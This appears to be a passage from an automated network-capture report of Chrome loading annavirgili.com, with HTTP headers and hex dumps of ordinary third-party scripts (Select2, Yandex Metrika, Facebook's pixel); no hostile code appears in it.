                                                                                                          2024-12-12 11:58:36 UTC16384INData Raw: 69 6e 66 69 6e 69 74 65 53 63 72 6f 6c 6c 22 2c 22 2e 2f 64 72 6f 70 64 6f 77 6e 2f 61 74 74 61 63 68 42 6f 64 79 22 2c 22 2e 2f 64 72 6f 70 64 6f 77 6e 2f 6d 69 6e 69 6d 75 6d 52 65 73 75 6c 74 73 46 6f 72 53 65 61 72 63 68 22 2c 22 2e 2f 64 72 6f 70 64 6f 77 6e 2f 73 65 6c 65 63 74 4f 6e 43 6c 6f 73 65 22 2c 22 2e 2f 64 72 6f 70 64 6f 77 6e 2f 63 6c 6f 73 65 4f 6e 53 65 6c 65 63 74 22 2c 22 2e 2f 69 31 38 6e 2f 65 6e 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 70 2c 68 2c 66 2c 67 2c 6d 2c 79 2c 76 2c 5f 2c 77 2c 24 2c 62 2c 74 2c 78 2c 41 2c 43 2c 53 2c 4f 2c 45 2c 44 2c 54 2c 71 2c 6a 2c 4c 2c 6b 2c 50 2c 49 2c 4d 2c 52 2c 65 29 7b 66 75 6e 63 74 69 6f 6e 20 6e 28 29 7b 74 68 69 73 2e 72 65 73 65 74 28 29 7d 72 65 74 75 72 6e 20 6e 2e 70 72 6f 74 6f 74 79 70
                                                                                                          Data Ascii: infiniteScroll","./dropdown/attachBody","./dropdown/minimumResultsForSearch","./dropdown/selectOnClose","./dropdown/closeOnSelect","./i18n/en"],function(p,h,f,g,m,y,v,_,w,$,b,t,x,A,C,S,O,E,D,T,q,j,L,k,P,I,M,R,e){function n(){this.reset()}return n.prototyp
                                                                                                          2024-12-12 11:58:36 UTC8595INData Raw: 65 72 20 74 68 61 74 20 6f 76 65 72 72 69 64 65 73 20 74 68 65 20 60 63 75 72 72 65 6e 74 60 20 6d 65 74 68 6f 64 2e 20 54 68 69 73 20 6d 65 74 68 6f 64 20 69 73 20 6e 6f 77 20 63 61 6c 6c 65 64 20 6d 75 6c 74 69 70 6c 65 20 74 69 6d 65 73 20 69 6e 73 74 65 61 64 20 6f 66 20 61 20 73 69 6e 67 6c 65 20 74 69 6d 65 20 77 68 65 6e 20 74 68 65 20 69 6e 73 74 61 6e 63 65 20 69 73 20 69 6e 69 74 69 61 6c 69 7a 65 64 2e 20 53 75 70 70 6f 72 74 20 77 69 6c 6c 20 62 65 20 72 65 6d 6f 76 65 64 20 66 6f 72 20 74 68 65 20 60 69 6e 69 74 53 65 6c 65 63 74 69 6f 6e 60 20 6f 70 74 69 6f 6e 20 69 6e 20 66 75 74 75 72 65 20 76 65 72 73 69 6f 6e 73 20 6f 66 20 53 65 6c 65 63 74 32 22 29 2c 74 68 69 73 2e 69 6e 69 74 53 65 6c 65 63 74 69 6f 6e 3d 6e 2e 67 65 74 28 22 69 6e
                                                                                                          Data Ascii: er that overrides the `current` method. This method is now called multiple times instead of a single time when the instance is initialized. Support will be removed for the `initSelection` option in future versions of Select2"),this.initSelection=n.get("in


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          123192.168.2.244991693.158.134.1194437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:35 UTC532OUTGET /metrika/tag.js HTTP/1.1
                                                                                                          Host: mc.yandex.ru
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: script
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2024-12-12 11:58:36 UTC1328INHTTP/1.1 200 OK
                                                                                                          Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                          Accept-Ranges: bytes
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Cache-Control: max-age=3600
                                                                                                          Connection: Close
                                                                                                          Content-Length: 226005
                                                                                                          Content-Type: application/javascript
                                                                                                          Date: Thu, 12 Dec 2024 11:58:36 GMT
                                                                                                          ETag: "674f133a-372d5"
                                                                                                          Expires: Thu, 12 Dec 2024 12:58:36 GMT
                                                                                                          Last-Modified: Tue, 03 Dec 2024 14:18:34 GMT
                                                                                                          Set-Cookie: _yasc=eXUNJqdBGmA1If7R2jioJr6HoYmqJlEZCBm3XfSU0xQwHuh0DgSmJC+QOo0yMNYLDLo=; domain=.yandex.ru; path=/; expires=Sun, 10 Dec 2034 11:58:36 GMT; secure
                                                                                                          Set-Cookie: i=96xGCg/B76lP5HwtTxQbNXsxxopCvWDeih1g6L7RhKLFu6W66cXP1EryUhd2daztrkzFZ+CGMinOrjHdDZIHndpqRFo=; Expires=Sat, 12-Dec-2026 11:58:36 GMT; Domain=.yandex.ru; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                          Set-Cookie: yandexuid=2276949521734004716; Expires=Sat, 12-Dec-2026 11:58:36 GMT; Domain=.yandex.ru; Path=/; Secure; SameSite=None
                                                                                                          Set-Cookie: yashr=5720641361734004716; Path=/; Domain=.yandex.ru; Expires=Fri, 12 Dec 2025 11:58:36 GMT; SameSite=None; Secure; HttpOnly
                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                          Timing-Allow-Origin: *
                                                                                                          2024-12-12 11:58:36 UTC5096INData Raw: ef bb bf 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 4c 61 28 62 61 29 7b 76 61 72 20 74 61 3d 30 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 61 3c 62 61 2e 6c 65 6e 67 74 68 3f 7b 64 6f 6e 65 3a 21 31 2c 76 61 6c 75 65 3a 62 61 5b 74 61 2b 2b 5d 7d 3a 7b 64 6f 6e 65 3a 21 30 7d 7d 7d 66 75 6e 63 74 69 6f 6e 20 74 28 62 61 29 7b 76 61 72 20 74 61 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 26 26 62 61 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3b 69 66 28 74 61 29 72 65 74 75 72 6e 20 74 61 2e 63 61 6c 6c 28 62 61 29 3b 69 66 28 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 62 61 2e 6c 65 6e 67 74 68
                                                                                                          Data Ascii: (function(){function La(ba){var ta=0;return function(){return ta<ba.length?{done:!1,value:ba[ta++]}:{done:!0}}}function t(ba){var ta="undefined"!=typeof Symbol&&Symbol.iterator&&ba[Symbol.iterator];if(ta)return ta.call(ba);if("number"==typeof ba.length
                                                                                                          2024-12-12 11:58:36 UTC8168INData Raw: 64 2c 65 29 7b 76 61 72 20 66 3d 64 2e 64 61 74 61 3b 62 3d 48 28 66 29 3f 66 3a 55 6d 28 66 2c 62 29 3b 65 3d 56 6d 28 65 2e 70 65 72 6d 69 73 73 69 6f 6e 73 2c 65 2e 59 29 3b 64 3d 4e 28 66 75 6e 63 74 69 6f 6e 28 67 2c 68 29 7b 76 61 72 20 6b 3d 74 28 68 29 2c 6c 3d 6b 2e 6e 65 78 74 28 29 2e 76 61 6c 75 65 3b 6b 3d 6b 2e 6e 65 78 74 28 29 2e 76 61 6c 75 65 3b 6b 3d 28 52 28 6b 29 2c 6b 29 3b 67 5b 6c 5d 3d 65 64 28 61 2c 6b 29 3b 72 65 74 75 72 6e 20 67 7d 2c 7b 7d 2c 46 61 28 64 2e 73 65 74 74 69 6e 67 73 7c 7c 7b 7d 29 29 3b 57 6d 28 61 2c 62 2c 7b 59 3a 65 2c 64 61 74 61 3a 64 2c 65 76 65 6e 74 3a 63 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 55 6d 28 61 2c 62 29 7b 69 66 28 21 54 28 62 2c 0a 22 63 6f 64 65 22 29 7c 7c 21 48 28 62 2e 63 6f 64 65 29 7c 7c
                                                                                                          Data Ascii: d,e){var f=d.data;b=H(f)?f:Um(f,b);e=Vm(e.permissions,e.Y);d=N(function(g,h){var k=t(h),l=k.next().value;k=k.next().value;k=(R(k),k);g[l]=ed(a,k);return g},{},Fa(d.settings||{}));Wm(a,b,{Y:e,data:d,event:c})}function Um(a,b){if(!T(b,"code")||!H(b.code)||
                                                                                                          2024-12-12 11:58:36 UTC8168INData Raw: 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 72 65 74 75 72 6e 20 62 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 61 72 67 75 6d 65 6e 74 73 29 7d 63 61 74 63 68 28 64 29 7b 64 69 28 61 2c 64 29 7d 72 65 74 75 72 6e 20 63 7d 7d 66 75 6e 63 74 69 6f 6e 20 6f 6e 28 61 2c 62 2c 63 2c 64 29 7b 64 3d 76 6f 69 64 20 30 3d 3d 3d 64 3f 22 64 61 74 61 4c 61 79 65 72 22 3a 64 3b 76 61 72 20 65 3d 5b 5d 2c 66 3d 5b 5d 3b 7a 28 66 75 6e 63 74 69 6f 6e 28 67 29 7b 69 66 28 47 28 67 2c 70 6e 29 29 7b 76 61 72 20 68 3d 71 6e 28 61 2c 67 2c 62 29 3b 68 26 26 65 2e 70 75 73 68 28 68 29 3b 47 28 67 2c 72 6e 29 26 26 66 2e 70 75 73 68 28 67 29 7d 65 6c 73 65 20 66 2e 70 75 73 68 28 67 29 7d 2c 0a 76 64 28 66 75 6e 63 74 69 6f 6e 28 67 2c 68 29 7b 76 61 72 20 6b 3d 49 63 28 61 29 28 67
                                                                                                          Data Ascii: unction(){try{return b.apply(null,arguments)}catch(d){di(a,d)}return c}}function on(a,b,c,d){d=void 0===d?"dataLayer":d;var e=[],f=[];z(function(g){if(G(g,pn)){var h=qn(a,g,b);h&&e.push(h);G(g,rn)&&f.push(g)}else f.push(g)},vd(function(g,h){var k=Ic(a)(g
                                                                                                          2024-12-12 11:58:36 UTC4680INData Raw: 49 6e 69 74 69 61 6c 69 7a 65 72 22 29 2c 65 3d 6e 28 64 2c 22 69 6e 69 74 22 29 3b 69 66 28 65 29 74 72 79 7b 49 28 65 2c 64 29 28 53 62 28 61 2c 62 29 29 7d 63 61 74 63 68 28 66 29 7b 7d 65 6c 73 65 20 41 69 3d 58 28 61 2c 46 28 5b 61 2c 62 2c 32 2a 63 5d 2c 7a 69 29 2c 63 2c 22 61 69 2e 64 22 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 61 28 61 2c 41 69 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 42 69 28 61 2c 62 2c 63 2c 64 29 7b 76 61 72 20 65 3d 63 2e 24 68 2c 66 3d 63 2e 56 68 2c 67 3d 63 2e 69 73 54 72 75 73 74 65 64 3b 63 3d 63 2e 53 64 3b 0a 61 3d 24 66 28 61 2c 66 29 3b 66 3d 66 2e 72 65 61 64 4f 6e 6c 79 3b 76 61 72 20 68 3d 7b 7d 2c 6b 3d 7b 7d 3b 64 3d 28 6b 2e 66 69 3d 61 67 28 28 68 2e 61 3d 65 3f 31 3a 30
                                                                                                          Data Ascii: Initializer"),e=n(d,"init");if(e)try{I(e,d)(Sb(a,b))}catch(f){}else Ai=X(a,F([a,b,2*c],zi),c,"ai.d");return function(){return ra(a,Ai)}}function Bi(a,b,c,d){var e=c.$h,f=c.Vh,g=c.isTrusted;c=c.Sd;a=$f(a,f);f=f.readOnly;var h={},k={};d=(k.fi=ag((h.a=e?1:0
                                                                                                          2024-12-12 11:58:36 UTC8168INData Raw: 28 61 2c 63 29 3a 22 22 7d 66 75 6e 63 74 69 6f 6e 20 66 67 28 61 2c 62 2c 63 29 7b 69 66 28 62 3d 49 61 28 61 2c 62 29 29 61 3d 50 65 28 5b 22 64 72 22 2c 63 7c 7c 22 22 2b 63 62 28 61 2c 31 30 2c 39 39 29 5d 29 2c 62 2e 70 61 72 61 6d 73 28 50 65 28 5b 22 5f 5f 79 6d 22 2c 61 5d 29 29 7d 66 75 6e 63 74 69 6f 6e 20 65 67 28 61 2c 0a 62 29 7b 76 61 72 20 63 3d 6e 75 6c 6c 3b 74 72 79 7b 63 3d 62 3f 50 63 28 62 2c 61 29 3a 63 7d 63 61 74 63 68 28 64 29 7b 7d 72 65 74 75 72 6e 20 63 7d 66 75 6e 63 74 69 6f 6e 20 4d 69 28 61 29 7b 61 3d 53 61 28 54 66 28 61 29 29 3b 72 65 74 75 72 6e 20 45 28 66 75 6e 63 74 69 6f 6e 28 62 29 7b 62 3d 62 2e 63 68 61 72 43 6f 64 65 41 74 28 30 29 2e 74 6f 53 74 72 69 6e 67 28 32 29 3b 72 65 74 75 72 6e 20 4e 69 28 22 30 22 2c
                                                                                                          Data Ascii: (a,c):""}function fg(a,b,c){if(b=Ia(a,b))a=Pe(["dr",c||""+cb(a,10,99)]),b.params(Pe(["__ym",a]))}function eg(a,b){var c=null;try{c=b?Pc(b,a):c}catch(d){}return c}function Mi(a){a=Sa(Tf(a));return E(function(b){b=b.charCodeAt(0).toString(2);return Ni("0",
                                                                                                          2024-12-12 11:58:36 UTC8168INData Raw: 2a 28 31 2b 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 29 29 2e 74 6f 53 74 72 69 6e 67 28 31 36 29 2e 73 75 62 73 74 72 69 6e 67 28 31 29 7d 66 75 6e 63 74 69 6f 6e 20 49 64 28 61 2c 0a 62 2c 63 29 7b 61 3d 55 2e 63 61 6c 6c 28 74 68 69 73 2c 61 2c 62 2c 63 29 7c 7c 74 68 69 73 3b 61 2e 76 69 73 69 62 69 6c 69 74 79 3d 6e 75 6c 6c 3b 52 28 61 2e 6c 2e 64 6f 63 75 6d 65 6e 74 2e 68 69 64 64 65 6e 29 3f 52 28 61 2e 6c 2e 64 6f 63 75 6d 65 6e 74 2e 6d 73 48 69 64 64 65 6e 29 3f 52 28 61 2e 6c 2e 64 6f 63 75 6d 65 6e 74 2e 77 65 62 6b 69 74 48 69 64 64 65 6e 29 7c 7c 28 61 2e 76 69 73 69 62 69 6c 69 74 79 3d 7b 68 69 64 64 65 6e 3a 22 77 65 62 6b 69 74 48 69 64 64 65 6e 22 2c 65 76 65 6e 74 3a 22 77 65 62 6b 69 74 76 69 73 69 62 69 6c 69 74 79 63 68 61 6e 67 65
                                                                                                          Data Ascii: *(1+Math.random())).toString(16).substring(1)}function Id(a,b,c){a=U.call(this,a,b,c)||this;a.visibility=null;R(a.l.document.hidden)?R(a.l.document.msHidden)?R(a.l.document.webkitHidden)||(a.visibility={hidden:"webkitHidden",event:"webkitvisibilitychange
                                                                                                          2024-12-12 11:58:36 UTC8168INData Raw: 62 28 61 29 7c 7c 22 22 29 7c 7c 28 64 3d 22 62 22 29 3b 0a 76 61 72 20 65 3d 6e 28 62 2c 22 73 65 74 74 69 6e 67 73 2e 77 65 62 76 69 73 6f 72 2e 72 65 63 70 22 29 3b 69 66 28 21 61 2e 69 73 46 69 6e 69 74 65 28 65 29 7c 7c 30 3e 65 7c 7c 31 3c 65 29 64 3d 22 77 22 3b 64 7c 7c 28 64 3d 4c 28 61 29 2e 43 28 22 68 69 74 49 64 22 29 25 31 45 34 2f 31 45 34 3c 65 3f 22 77 22 3a 22 62 22 29 3b 63 2e 44 28 22 76 69 73 6f 72 63 22 2c 64 2c 33 30 29 3b 72 65 74 75 72 6e 22 77 22 3d 3d 3d 64 7d 66 75 6e 63 74 69 6f 6e 20 54 65 28 61 2c 62 2c 63 29 7b 61 3d 67 63 2e 63 61 6c 6c 28 74 68 69 73 2c 61 2c 62 2c 63 29 7c 7c 74 68 69 73 3b 61 2e 62 75 66 66 65 72 3d 5b 5d 3b 61 2e 41 67 3d 37 35 30 30 3b 61 2e 24 63 3d 33 45 34 3b 61 2e 55 63 28 29 3b 72 65 74 75 72 6e
                                                                                                          Data Ascii: b(a)||"")||(d="b");var e=n(b,"settings.webvisor.recp");if(!a.isFinite(e)||0>e||1<e)d="w";d||(d=L(a).C("hitId")%1E4/1E4<e?"w":"b");c.D("visorc",d,30);return"w"===d}function Te(a,b,c){a=gc.call(this,a,b,c)||this;a.buffer=[];a.Ag=7500;a.$c=3E4;a.Uc();return
                                                                                                          2024-12-12 11:58:36 UTC8168INData Raw: 5b 68 5d 29 3b 6d 2e 70 75 73 68 28 5b 30 2c 30 2c 7a 67 5d 29 3b 6d 2e 70 75 73 68 28 5b 30 2c 63 61 28 67 29 2c 59 63 5d 29 3b 6d 2e 75 6e 73 68 69 66 74 28 5b 30 2c 30 2c 41 67 5d 29 3b 44 61 28 66 2c 6d 29 3b 2d 2d 68 7d 65 6c 73 65 20 69 66 28 68 26 32 29 7b 76 61 72 20 70 3d 74 28 65 29 3b 70 2e 6e 65 78 74 28 29 3b 70 2e 6e 65 78 74 28 29 3b 6c 3d 70 2e 6e 65 78 74 28 29 2e 76 61 6c 75 65 3b 68 3d 70 2e 6e 65 78 74 28 29 2e 76 61 6c 75 65 3b 6d 3d 70 2e 6e 65 78 74 28 29 2e 76 61 6c 75 65 3b 70 3d 70 2e 6e 65 78 74 28 29 2e 76 61 6c 75 65 3b 66 6f 72 28 76 61 72 20 72 3d 6c 61 28 6b 29 2c 71 3d 72 2e 6c 65 6e 67 74 68 2d 31 3b 30 3c 3d 71 3b 29 7b 76 61 72 20 76 3d 72 5b 71 5d 3b 76 3d 5b 5b 30 2c 30 2c 41 67 5d 2c 5b 6d 2c 6b 5b 76 5d 2c 70 5d 2c
                                                                                                          Data Ascii: [h]);m.push([0,0,zg]);m.push([0,ca(g),Yc]);m.unshift([0,0,Ag]);Da(f,m);--h}else if(h&2){var p=t(e);p.next();p.next();l=p.next().value;h=p.next().value;m=p.next().value;p=p.next().value;for(var r=la(k),q=r.length-1;0<=q;){var v=r[q];v=[[0,0,Ag],[m,k[v],p],
                                                                                                          2024-12-12 11:58:36 UTC8168INData Raw: 65 2e 6e 65 78 74 28 29 2e 76 61 6c 75 65 2e 55 61 3b 65 3d 54 28 62 2c 64 29 26 26 21 68 61 28 62 5b 64 5d 29 3b 64 3d 62 5b 64 5d 21 3d 3d 28 66 7c 7c 59 29 28 76 6f 69 64 20 30 29 3b 72 65 74 75 72 6e 20 44 62 28 65 26 26 64 29 7d 2c 63 29 3b 72 65 74 75 72 6e 20 58 65 28 51 28 22 22 2c 63 29 29 7d 66 75 6e 63 74 69 6f 6e 20 75 71 28 61 29 7b 69 66 28 59 65 28 61 29 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 76 61 72 20 62 3d 76 71 28 61 29 2c 63 3d 62 2e 4b 66 3b 52 28 63 29 26 26 28 62 2e 4b 66 3d 6e 75 6c 6c 2c 77 71 28 61 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 64 29 7b 62 2e 4b 66 3d 64 7d 29 29 3b 72 65 74 75 72 6e 20 63 3f 31 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 78 71 28 61 2c 62 2c 63 29 7b 69 66 28 28 76 6f 69 64 20 30 3d 3d 3d 63
                                                                                                          Data Ascii: e.next().value.Ua;e=T(b,d)&&!ha(b[d]);d=b[d]!==(f||Y)(void 0);return Db(e&&d)},c);return Xe(Q("",c))}function uq(a){if(Ye(a))return null;var b=vq(a),c=b.Kf;R(c)&&(b.Kf=null,wq(a).then(function(d){b.Kf=d}));return c?1:null}function xq(a,b,c){if((void 0===c
                                                                                                          2024-12-12 11:58:36 UTC8168INData Raw: 61 62 73 28 63 2e 70 6f 73 69 74 69 6f 6e 2e 79 2d 0a 62 2e 70 6f 73 69 74 69 6f 6e 2e 79 29 3b 62 3d 62 2e 74 69 6d 65 2d 63 2e 74 69 6d 65 3b 69 66 28 63 2e 65 6c 65 6d 65 6e 74 3d 3d 3d 64 26 26 32 3e 65 26 26 32 3e 61 26 26 31 45 33 3e 62 29 72 65 74 75 72 6e 21 31 7d 66 6f 72 28 3b 64 3b 29 7b 69 66 28 24 71 28 64 29 29 72 65 74 75 72 6e 21 31 3b 64 3d 64 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 7d 72 65 74 75 72 6e 21 30 7d 66 75 6e 63 74 69 6f 6e 20 61 72 28 61 2c 62 29 7b 76 61 72 20 63 3d 6e 75 6c 6c 3b 74 72 79 7b 69 66 28 63 3d 62 2e 74 61 72 67 65 74 7c 7c 62 2e 73 72 63 45 6c 65 6d 65 6e 74 29 21 63 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 26 26 63 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 3f 63 3d 63 2e 64 6f 63 75 6d 65 6e 74 45 6c
                                                                                                          Data Ascii: abs(c.position.y-b.position.y);b=b.time-c.time;if(c.element===d&&2>e&&2>a&&1E3>b)return!1}for(;d;){if($q(d))return!1;d=d.parentElement}return!0}function ar(a,b){var c=null;try{if(c=b.target||b.srcElement)!c.ownerDocument&&c.documentElement?c=c.documentEl


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          124192.168.2.2449918157.240.196.154437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:35 UTC367OUTGET /en_US/fbevents.js HTTP/1.1
                                                                                                          Host: connect.facebook.net
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2024-12-12 11:58:36 UTC1452INHTTP/1.1 200 OK
                                                                                                          Vary: Accept-Encoding
                                                                                                          Content-Type: application/x-javascript; charset=utf-8
                                                                                                          timing-allow-origin: *
                                                                                                          reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"
                                                                                                          report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                          content-security-policy: default-src 'self' data: blob: *;script-src 'nonce-DkDxIDEJ' *.facebook.com *.fbcdn.net *.facebook.net 127.0.0.1:* blob: data: 'self' https://*.google-analytics.com *.google.com;style-src data: blob: 'unsafe-inline' *;connect-src *.facebook.com facebook.com *.fbcdn.net *.facebook.net wss://*.facebook.com:* wss://*.whatsapp.com:* wss://*.fbcdn.net attachment.fbsbx.com ws://localhost:* blob: *.cdninstagram.com 'self' https://*.google-analytics.com;img-src 'self' data: blob: * https://*.google-analytics.com;block-all-mixed-content;upgrade-insecure-requests;require-trusted-types-for 'script';
                                                                                                          document-policy: force-load-at-top
                                                                                                          2024-12-12 11:58:36 UTC1670INData Raw: 70 65 72 6d 69 73 73 69 6f 6e 73 2d 70 6f 6c 69 63 79 3a 20 61 63 63 65 6c 65 72 6f 6d 65 74 65 72 3d 28 29 2c 20 61 74 74 72 69 62 75 74 69 6f 6e 2d 72 65 70 6f 72 74 69 6e 67 3d 28 29 2c 20 61 75 74 6f 70 6c 61 79 3d 28 29 2c 20 62 6c 75 65 74 6f 6f 74 68 3d 28 29 2c 20 63 61 6d 65 72 61 3d 28 29 2c 20 63 68 2d 64 65 76 69 63 65 2d 6d 65 6d 6f 72 79 3d 28 29 2c 20 63 68 2d 64 6f 77 6e 6c 69 6e 6b 3d 28 29 2c 20 63 68 2d 64 70 72 3d 28 29 2c 20 63 68 2d 65 63 74 3d 28 29 2c 20 63 68 2d 72 74 74 3d 28 29 2c 20 63 68 2d 73 61 76 65 2d 64 61 74 61 3d 28 29 2c 20 63 68 2d 75 61 2d 61 72 63 68 3d 28 29 2c 20 63 68 2d 75 61 2d 62 69 74 6e 65 73 73 3d 28 29 2c 20 63 68 2d 76 69 65 77 70 6f 72 74 2d 68 65 69 67 68 74 3d 28 29 2c 20 63 68 2d 76 69 65 77 70 6f 72
                                                                                                          Data Ascii: permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewpor
                                                                                                          2024-12-12 11:58:36 UTC1INData Raw: 2f
                                                                                                          Data Ascii: /
                                                                                                          2024-12-12 11:58:36 UTC14680INData Raw: 2a 2a 0a 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 37 2d 70 72 65 73 65 6e 74 2c 20 46 61 63 65 62 6f 6f 6b 2c 20 49 6e 63 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 2a 0a 2a 20 59 6f 75 20 61 72 65 20 68 65 72 65 62 79 20 67 72 61 6e 74 65 64 20 61 20 6e 6f 6e 2d 65 78 63 6c 75 73 69 76 65 2c 20 77 6f 72 6c 64 77 69 64 65 2c 20 72 6f 79 61 6c 74 79 2d 66 72 65 65 20 6c 69 63 65 6e 73 65 20 74 6f 20 75 73 65 2c 0a 2a 20 63 6f 70 79 2c 20 6d 6f 64 69 66 79 2c 20 61 6e 64 20 64 69 73 74 72 69 62 75 74 65 20 74 68 69 73 20 73 6f 66 74 77 61 72 65 20 69 6e 20 73 6f 75 72 63 65 20 63 6f 64 65 20 6f 72 20 62 69 6e 61 72 79 20 66 6f 72 6d 20 66 6f 72 20 75 73 65 0a 2a 20 69 6e 20 63 6f 6e 6e 65 63 74 69 6f 6e 20 77 69 74
                                                                                                          Data Ascii: *** Copyright (c) 2017-present, Facebook, Inc. All rights reserved.** You are hereby granted a non-exclusive, worldwide, royalty-free license to use,* copy, modify, and distribute this software in source code or binary form for use* in connection wit
                                                                                                          2024-12-12 11:58:36 UTC16384INData Raw: 7c 64 3d 3d 3d 22 47 54 4d 22 7c 7c 64 3d 3d 3d 22 4a 53 4f 4e 5f 4c 44 22 7c 7c 64 3d 3d 3d 22 4d 45 54 41 5f 54 41 47 22 7c 7c 64 3d 3d 3d 22 4f 50 45 4e 5f 47 52 41 50 48 22 7c 7c 64 3d 3d 3d 22 52 44 46 41 22 7c 7c 64 3d 3d 3d 22 53 43 48 45 4d 41 5f 44 4f 54 5f 4f 52 47 22 7c 7c 64 3d 3d 3d 22 55 52 49 22 3f 64 3a 6e 75 6c 6c 3b 72 65 74 75 72 6e 20 62 21 3d 6e 75 6c 6c 26 26 63 21 3d 6e 75 6c 6c 26 26 61 21 3d 6e 75 6c 6c 26 26 64 21 3d 6e 75 6c 6c 3f 7b 64 6f 6d 61 69 6e 5f 75 72 69 3a 62 2c 65 76 65 6e 74 5f 74 79 70 65 3a 63 2c 65 78 74 72 61 63 74 6f 72 5f 74 79 70 65 3a 64 2c 69 64 3a 61 7d 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 67 28 61 29 7b 69 66 28 61 3d 3d 6e 75 6c 6c 7c 7c 28 74 79 70 65 6f 66 20 61 3d 3d 3d 22 75 6e 64 65 66 69 6e
                                                                                                          Data Ascii: |d==="GTM"||d==="JSON_LD"||d==="META_TAG"||d==="OPEN_GRAPH"||d==="RDFA"||d==="SCHEMA_DOT_ORG"||d==="URI"?d:null;return b!=null&&c!=null&&a!=null&&d!=null?{domain_uri:b,event_type:c,extractor_type:d,id:a}:null}function g(a){if(a==null||(typeof a==="undefin
